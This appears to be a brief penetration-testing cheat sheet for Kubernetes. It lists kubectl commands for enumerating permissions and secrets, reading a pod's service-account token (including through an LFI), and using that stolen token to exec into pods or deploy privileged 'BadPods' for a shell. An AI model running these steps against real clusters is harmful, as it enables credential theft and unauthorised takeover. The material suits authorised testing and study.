# Kubectl ```sh kubectl get pods ``` * Check mounted secret ```sh kubectl auth can-i --list kubectl get secrets kubectl get nodes kubectl get deployments kubectl get services kubectl get ingress kubectl get jobs ``` * Intel about a secret, and output ```sh kubectl describe secrets kubectl describe secrets -o 'json' ``` ## Abuse Token * Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token` * By change of an LFI extract the token and ```sh kubectl auth can-i --list --token=$TOKEN kubectl get pods --token=$TOKEN kubectl exec -it --token=$TOKEN -- /bin/sh ``` ## Create Pods * Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git) * If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file ```sh kubectl apply -f pod.yml --token=$TOKEN kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash ```